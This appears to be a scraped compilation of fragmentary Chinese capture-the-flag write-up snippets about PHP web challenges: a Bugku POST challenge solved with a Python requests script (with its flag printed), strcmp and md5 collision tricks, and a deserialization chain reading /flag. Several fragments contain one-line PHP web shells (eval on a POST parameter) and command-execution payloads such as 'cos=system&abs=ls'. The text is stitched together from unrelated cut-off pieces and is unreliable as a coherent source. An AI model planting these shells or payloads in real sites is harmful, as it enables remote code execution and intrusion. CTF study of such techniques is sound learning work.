$what=$_POST['what']; //post提交数据echo$what;if($what=='flag')echo'flag{***}'; 源码如上,我们只需要post提交变量what=flag就欧克,使用插件HackBar提交 $what=$_POST['what'];echo$what;if($what=='flag')echo'flag{***}'; flagflag{bugku_get_ssseint67se} 得到flag...
第一种方法: 用FireFox的HackBar插件,传入参数what=flag run一下,爆出了flag 第二种方法: 写个脚本run一下试试: importrequests s=requests.Session()r=s.get("http://120.24.86.145:8002/post/")values={'what':'flag'}r=s.post("http://120.24.86.145:8002/post/",values)print(r.text) 直接爆出了...
用FireFox的HackBar插件,传入参数what=flag run一下,爆出了flag 第二种方法: 写个脚本run一下试试: 代码语言:javascript 代码运行次数:0 运行 AI代码解释 importrequests s=requests.Session()r=s.get("http://120.24.86.145:8002/post/")values={'what':'flag'}r=s.post("http://120.24.86.145:8002/post...
ptth://123.206.87.240:8002/post/ $what=$_POST['what'];//捕获POST 传参,whatecho$what;if($what=='flag')//if 判断$what 是否等于flagecho'flag{***}'; POST 传参,参数在请求正文中。 flag{bugku_get_ssseint67se}
2. 使用表单传递值:可以创建一个包含输入字段的HTML表单,在用户提交表单时,将值传递给PHP。可以使用POST方法将值传递给服务器端的PHP脚本。在PHP中,可以使用`$_POST`数组来访问这些传递过来的值。 3. 使用隐藏字段传递值:可以在HTML表单中添加隐藏字段来传递值,这样用户看不到这些字段,但在提交表单时,值会被传递...
n=1.php content=<?php eval($_POST[cmd])?> strcmp strcmp(string $string1, string $string2): int 如果 string1 小于string2 返回-1;如果 string1 大于string2 返回1;如果两者相等,返回 0 比较字符串和数组时,PHP<=5.2返回-1,PHP>=5.3返回0 strpos strpos('ab','b'); // 1 strpos('ab','...
$a=(string)$_POST['a'];$b=(string)$_POST['b'];if($a!=$b&&md5($a)===md5($b)){echo'success!';} 由于强制类型转换,传入数组会得到’Array’,这里我们只能需要一个md5前不等,md5后相等的值。 方法:使用Fastcoll生成 详细可见这篇文章 ...
var/www/html是Apache的默认路径,我们也可以直接写ls />abc 接着在ip地址后添加/abc,可以看到成功返回执行1.txt后的内容。 直接cat flag 我们还可以上传一个小马文件get flag 例如我们创建一个hello.php的文件,文件内容为 AI检测代码解析 echo "<?php eval(\$_POST['shell']);" 1. 然后cat flag...
POST DATA: cos=system&abs=ls 1. 2. 3. 4. 接下来查看flag就可以了 除此之外,还有限制长度的,如七字、五字绕过等等,这次就先总结到这里,下次再单独总结一篇关于长度被限制的。 参考博客 https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html ...
会对post数据进行序列化,然后反序列化,并且反序列化之前存在一个替换操作 然后会进入View: 存在echo字符串的操作,由此可触发__toString:全局搜索 会调用不存在的属性的值,会触发__get:全局搜索 利用链: user_view -> echo -> Request.__toString -> Index.__get -> file_get_contents(/flag) ...